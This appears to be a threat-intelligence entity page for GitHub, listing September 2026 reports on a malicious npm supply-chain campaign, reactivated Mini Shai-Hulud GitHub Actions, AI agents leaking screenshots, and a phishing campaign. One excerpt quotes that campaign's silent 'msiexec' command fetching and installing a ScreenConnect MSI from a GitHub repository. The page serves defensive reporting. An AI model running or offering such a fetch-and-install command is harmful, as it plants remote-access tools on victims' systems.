Vendor
GitHub
- First Reported
- Sep 22, 2026
- Latest Reported
- Sep 30, 2026
Reported Context (4)
- AI Coding Agents Leak 13,000 Internal Screenshots to Public GitHub Repos Glow Labs Says AI Coding Agents Exposed 13,000 Internal Screenshots on Public GitHub
- under Portuguese-language accounts uploaded at least twelve packages to npm and one payload repository to GitHub. Five packages carry MAL- advisories, three are malicious but unadvised, and four are benign tools the MALFEX: Malicious npm Supply-Chain Campaign Went Unadvised for 14 Months
- Two GitHub Actions from the actions-cool project were disabled again after becoming accessible and reactivating malicious payloads tied to the May 2026 Mini Shai-Hulud campaign. Compromised GitHub Actions Reactivated Mini Shai-Hulud Payloads After Repositories Returned Online
- msiexec /i "https://github.com/Ivan3900/test/raw/main/ScreenConnect.ClientSetup.msi" /quiet /norestart CSuite Campaign Uses Phishing, M365 Session Theft and Remote-Access Tools Against US and EU Organizations
Malware (4)
Threat Actors (2)
MITRE ATT&CK (31)
Vendors (9)
Products (20)
Tools (3)
Industries (11)
Countries (6)
Note: Related entities, including threat actors, malware, CVEs, MITRE ATT&CK techniques, vendors, products, tools, countries, and industries, are shown when they appear in the same reporting. Their presence does not necessarily mean they were targeted, compromised, vulnerable, responsible for the activity, or directly involved in the incident.